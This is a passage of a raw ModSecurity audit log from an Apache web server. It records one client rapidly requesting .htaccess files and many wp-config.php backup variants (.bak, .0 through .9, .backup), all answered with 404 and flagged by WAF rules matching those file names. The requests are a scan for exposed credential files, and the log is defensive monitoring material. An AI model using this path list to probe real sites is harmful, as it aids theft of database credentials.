"210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase ".htaccess" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.sarainternational.ae"] [uri "/a.htaccess"] [unique_id "aE3UNjV1wc8MD9ZPjDFaBQAAAAM"] Stopwatch: 1749931062519167 3250 (- - -) Stopwatch2: 1749931062519167 3250; combined=1917, p1=372, p2=1492, p3=0, p4=0, p5=53, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6d0f6133-Z-- --e56b4822-A-- [15/Jun/2025:01:27:42.637296 +0530] aE3UNqxP6lni_rLDdWJbWgAAAAw 185.177.72.108 49018 127.0.0.1 7081 --e56b4822-B-- GET /htaccess_for_page_not_found_redirects.htaccess HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --e56b4822-F-- HTTP/1.1 404 Not Found Last-Modified: Wed, 04 Sep 2024 11:42:46 GMT ETag: "328-62149ac424b46" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --e56b4822-H-- Message: Warning. Matched phrase ".htaccess" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase ".htaccess" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.sarainternational.ae"] [uri "/htaccess_for_page_not_found_redirects.htaccess"] [unique_id "aE3UNqxP6lni_rLDdWJbWgAAAAw"] Stopwatch: 1749931062633934 3415 (- - -) Stopwatch2: 1749931062633934 3415; combined=2075, p1=449, p2=1571, p3=0, p4=0, p5=55, sr=114, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e56b4822-Z-- --e1ffa86b-A-- [15/Jun/2025:01:27:45.135507 +0530] aE3UOZOn_2b0s5j3TtOJkwAAAAY 185.177.72.108 49206 127.0.0.1 7081 --e1ffa86b-B-- GET /wp-config.bak HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --e1ffa86b-F-- HTTP/1.1 404 Not Found Last-Modified: Wed, 04 Sep 2024 11:42:46 GMT ETag: "328-62149ac424b46" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --e1ffa86b-H-- Message: Warning. Matched phrase "wp-config.bak" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.sarainternational.ae|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.bak" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.sarainternational.ae"] [uri "/wp-config.bak"] [unique_id "aE3UOZOn_2b0s5j3TtOJkwAAAAY"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.sarainternational.ae|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.sarainternational.ae"] [uri "/wp-config.bak"] [unique_id "aE3UOZOn_2b0s5j3TtOJkwAAAAY"] Stopwatch: 1749931065132582 2979 (- - -) Stopwatch2: 1749931065132582 2979; combined=1711, p1=397, p2=1231, p3=0, p4=0, p5=83, sr=107, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e1ffa86b-Z-- --019b1426-A-- [15/Jun/2025:01:27:45.367223 +0530] aE3UOTV1wc8MD9ZPjDFaCAAAAAM 185.177.72.108 49212 127.0.0.1 7081 --019b1426-B-- GET /wp-config.php-bak HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --019b1426-F-- HTTP/1.1 404 Not Found Last-Modified: Wed, 04 Sep 2024 11:42:46 GMT ETag: "328-62149ac424b46" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --019b1426-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.sarainternational.ae"] [uri "/wp-config.php-bak"] [unique_id "aE3UOTV1wc8MD9ZPjDFaCAAAAAM"] Stopwatch: 1749931065362693 4608 (- - -) Stopwatch2: 1749931065362693 4608; combined=2795, p1=652, p2=2067, p3=0, p4=0, p5=76, sr=133, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --019b1426-Z-- --bf899668-A-- [15/Jun/2025:01:27:45.482978 +0530] aE3UOSUp1gCWWDzKyjSL-wAAAAs 185.177.72.108 49224 127.0.0.1 7081 --bf899668-B-- GET /wp-config.php.0 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --bf899668-F-- HTTP/1.1 404 Not Found Last-Modified: Wed, 04 Sep 2024 11:42:46 GMT ETag: "328-62149ac424b46" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --bf899668-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.sarainternational.ae"] [uri "/wp-config.php.0"] [unique_id "aE3UOSUp1gCWWDzKyjSL-wAAAAs"] Apache-Error: [file "./sapi/apache2handler/sapi_apache2.c"] [line 360] [level 3] script '/var/www/vhosts/sarainternational.ae/httpdocs/wp-config.php.0' not found or unable to stat Stopwatch: 1749931065479744 3291 (- - -) Stopwatch2: 1749931065479744 3291; combined=1889, p1=383, p2=1443, p3=0, p4=0, p5=63, sr=93, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --bf899668-Z-- --b2482c3e-A-- [15/Jun/2025:01:27:45.598022 +0530] aE3UOUMAAEyWrtlsmo2MswAAAAc 185.177.72.108 49240 127.0.0.1 7081 --b2482c3e-B-- GET /wp-config.php.1 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --b2482c3e-F-- HTTP/1.1 404 Not Found Last-Modified: Wed, 04 Sep 2024 11:42:46 GMT ETag: "328-62149ac424b46" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --b2482c3e-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.sarainternational.ae"] [uri "/wp-config.php.1"] [unique_id "aE3UOUMAAEyWrtlsmo2MswAAAAc"] Apache-Error: [file "./sapi/apache2handler/sapi_apache2.c"] [line 360] [level 3] script '/var/www/vhosts/sarainternational.ae/httpdocs/wp-config.php.1' not found or unable to stat Stopwatch: 1749931065594848 3231 (- - -) Stopwatch2: 1749931065594848 3231; combined=1918, p1=380, p2=1474, p3=0, p4=0, p5=64, sr=92, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b2482c3e-Z-- --ee08bd38-A-- [15/Jun/2025:01:27:45.713360 +0530] aE3UOZf90d3VSj3QpDNzeAAAAAQ 185.177.72.108 49246 127.0.0.1 7081 --ee08bd38-B-- GET /wp-config.php.2 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --ee08bd38-F-- HTTP/1.1 404 Not Found Last-Modified: Wed, 04 Sep 2024 11:42:46 GMT ETag: "328-62149ac424b46" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --ee08bd38-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.sarainternational.ae"] [uri "/wp-config.php.2"] [unique_id "aE3UOZf90d3VSj3QpDNzeAAAAAQ"] Apache-Error: [file "./sapi/apache2handler/sapi_apache2.c"] [line 360] [level 3] script '/var/www/vhosts/sarainternational.ae/httpdocs/wp-config.php.2' not found or unable to stat Stopwatch: 1749931065710131 3296 (- - -) Stopwatch2: 1749931065710131 3296; combined=1913, p1=388, p2=1456, p3=0, p4=0, p5=69, sr=93, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ee08bd38-Z-- --d7bf055e-A-- [15/Jun/2025:01:27:45.828485 +0530] aE3UOalFM0RY285MG1CIRgAAAAk 185.177.72.108 49256 127.0.0.1 7081 --d7bf055e-B-- GET /wp-config.php.3 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --d7bf055e-F-- HTTP/1.1 404 Not Found Last-Modified: Wed, 04 Sep 2024 11:42:46 GMT ETag: "328-62149ac424b46" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --d7bf055e-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.sarainternational.ae"] [uri "/wp-config.php.3"] [unique_id "aE3UOalFM0RY285MG1CIRgAAAAk"] Apache-Error: [file "./sapi/apache2handler/sapi_apache2.c"] [line 360] [level 3] script '/var/www/vhosts/sarainternational.ae/httpdocs/wp-config.php.3' not found or unable to stat Stopwatch: 1749931065825226 3315 (- - -) Stopwatch2: 1749931065825226 3315; combined=1913, p1=469, p2=1372, p3=0, p4=0, p5=72, sr=116, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d7bf055e-Z-- --98b26a54-A-- [15/Jun/2025:01:27:45.943733 +0530] aE3UOeh_Rdu0duNoj2H4fAAAAAo 185.177.72.108 49264 127.0.0.1 7081 --98b26a54-B-- GET /wp-config.php.4 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --98b26a54-F-- HTTP/1.1 404 Not Found Last-Modified: Wed, 04 Sep 2024 11:42:46 GMT ETag: "328-62149ac424b46" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --98b26a54-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.sarainternational.ae"] [uri "/wp-config.php.4"] [unique_id "aE3UOeh_Rdu0duNoj2H4fAAAAAo"] Apache-Error: [file "./sapi/apache2handler/sapi_apache2.c"] [line 360] [level 3] script '/var/www/vhosts/sarainternational.ae/httpdocs/wp-config.php.4' not found or unable to stat Stopwatch: 1749931065940363 3449 (- - -) Stopwatch2: 1749931065940363 3449; combined=2036, p1=360, p2=1593, p3=0, p4=0, p5=82, sr=89, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --98b26a54-Z-- --6711d549-A-- [15/Jun/2025:01:27:46.356747 +0530] aE3UOpOn_2b0s5j3TtOJlAAAAAY 185.177.72.108 49294 127.0.0.1 7081 --6711d549-B-- GET /wp-config.php.5 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --6711d549-F-- HTTP/1.1 404 Not Found Last-Modified: Wed, 04 Sep 2024 11:42:46 GMT ETag: "328-62149ac424b46" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --6711d549-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.sarainternational.ae"] [uri "/wp-config.php.5"] [unique_id "aE3UOpOn_2b0s5j3TtOJlAAAAAY"] Apache-Error: [file "./sapi/apache2handler/sapi_apache2.c"] [line 360] [level 3] script '/var/www/vhosts/sarainternational.ae/httpdocs/wp-config.php.5' not found or unable to stat Stopwatch: 1749931066353464 3338 (- - -) Stopwatch2: 1749931066353464 3338; combined=1970, p1=401, p2=1513, p3=0, p4=0, p5=56, sr=105, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6711d549-Z-- --bc07c603-A-- [15/Jun/2025:01:27:46.471885 +0530] aE3UOjV1wc8MD9ZPjDFaCQAAAAM 185.177.72.108 49320 127.0.0.1 7081 --bc07c603-B-- GET /wp-config.php.6 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --bc07c603-F-- HTTP/1.1 404 Not Found Last-Modified: Wed, 04 Sep 2024 11:42:46 GMT ETag: "328-62149ac424b46" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --bc07c603-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.sarainternational.ae"] [uri "/wp-config.php.6"] [unique_id "aE3UOjV1wc8MD9ZPjDFaCQAAAAM"] Apache-Error: [file "./sapi/apache2handler/sapi_apache2.c"] [line 360] [level 3] script '/var/www/vhosts/sarainternational.ae/httpdocs/wp-config.php.6' not found or unable to stat Stopwatch: 1749931066468474 3468 (- - -) Stopwatch2: 1749931066468474 3468; combined=2003, p1=422, p2=1520, p3=0, p4=0, p5=61, sr=88, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --bc07c603-Z-- --994e5055-A-- [15/Jun/2025:01:27:46.585594 +0530] aE3UOiUp1gCWWDzKyjSL_AAAAAs 185.177.72.108 49340 127.0.0.1 7081 --994e5055-B-- GET /wp-config.php.7 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --994e5055-F-- HTTP/1.1 404 Not Found Last-Modified: Wed, 04 Sep 2024 11:42:46 GMT ETag: "328-62149ac424b46" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --994e5055-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.sarainternational.ae"] [uri "/wp-config.php.7"] [unique_id "aE3UOiUp1gCWWDzKyjSL_AAAAAs"] Apache-Error: [file "./sapi/apache2handler/sapi_apache2.c"] [line 360] [level 3] script '/var/www/vhosts/sarainternational.ae/httpdocs/wp-config.php.7' not found or unable to stat Stopwatch: 1749931066583061 2587 (- - -) Stopwatch2: 1749931066583061 2587; combined=1569, p1=327, p2=1186, p3=0, p4=0, p5=56, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --994e5055-Z-- --c0172c01-A-- [15/Jun/2025:01:27:46.700255 +0530] aE3UOkMAAEyWrtlsmo2MtAAAAAc 185.177.72.108 49342 127.0.0.1 7081 --c0172c01-B-- GET /wp-config.php.8 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --c0172c01-F-- HTTP/1.1 404 Not Found Last-Modified: Wed, 04 Sep 2024 11:42:46 GMT ETag: "328-62149ac424b46" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --c0172c01-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.sarainternational.ae"] [uri "/wp-config.php.8"] [unique_id "aE3UOkMAAEyWrtlsmo2MtAAAAAc"] Apache-Error: [file "./sapi/apache2handler/sapi_apache2.c"] [line 360] [level 3] script '/var/www/vhosts/sarainternational.ae/httpdocs/wp-config.php.8' not found or unable to stat Stopwatch: 1749931066697411 2898 (- - -) Stopwatch2: 1749931066697411 2898; combined=1665, p1=362, p2=1246, p3=0, p4=0, p5=57, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c0172c01-Z-- --8fc10f1d-A-- [15/Jun/2025:01:27:46.815129 +0530] aE3UOpf90d3VSj3QpDNzeQAAAAQ 185.177.72.108 49344 127.0.0.1 7081 --8fc10f1d-B-- GET /wp-config.php.9 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --8fc10f1d-F-- HTTP/1.1 404 Not Found Last-Modified: Wed, 04 Sep 2024 11:42:46 GMT ETag: "328-62149ac424b46" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --8fc10f1d-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.sarainternational.ae"] [uri "/wp-config.php.9"] [unique_id "aE3UOpf90d3VSj3QpDNzeQAAAAQ"] Apache-Error: [file "./sapi/apache2handler/sapi_apache2.c"] [line 360] [level 3] script '/var/www/vhosts/sarainternational.ae/httpdocs/wp-config.php.9' not found or unable to stat Stopwatch: 1749931066812265 2928 (- - -) Stopwatch2: 1749931066812265 2928; combined=1675, p1=378, p2=1240, p3=0, p4=0, p5=57, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --8fc10f1d-Z-- --f1d61371-A-- [15/Jun/2025:01:27:46.929721 +0530] aE3UOlj2r5sYBjRDYxhz5gAAAAU 185.177.72.108 49360 127.0.0.1 7081 --f1d61371-B-- GET /wp-config.php.backup HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --f1d61371-F-- HTTP/1.1 404 Not Found Last-Modified: Wed, 04 Sep 2024 11:42:46 GMT ETag: "328-62149ac424b46" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --f1d61371-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.sarainternational.ae|F|2"] [data ".php.backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.sarainternational.ae"] [uri "/wp-config.php.backup"] [unique_id "aE3UOlj2r5sYBjRDYxhz5gAAAAU"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.sarainternational.ae|F|2"] [data ".php.backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.sarainternational.ae"] [uri "/wp-config.php.backup"] [unique_id "aE3UOlj2r5sYBjRDYxhz5gAAAAU"] Apache-Error: [file "./sapi/apache2handler/sapi_apache2.c"] [line 360] [level 3] script '/var/www/vhosts/sarainternational.ae/httpdocs/wp-config.php.backup' not found or unable to stat Stopwatch: 1749931066926916 2857 (- - -) Stopwatch2: 1749931066926916 2857; combined=1736, p1=334, p2=1320, p3=0, p4=0, p5=82, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f1d61371-Z-- --1a82191f-A-- [15/Jun/2025:01:27:47.045039 +0530] aE3UO-k-MTQZUjwklQN1GAAAAAg 185.177.72.108 49380 127.0.0.1 7081 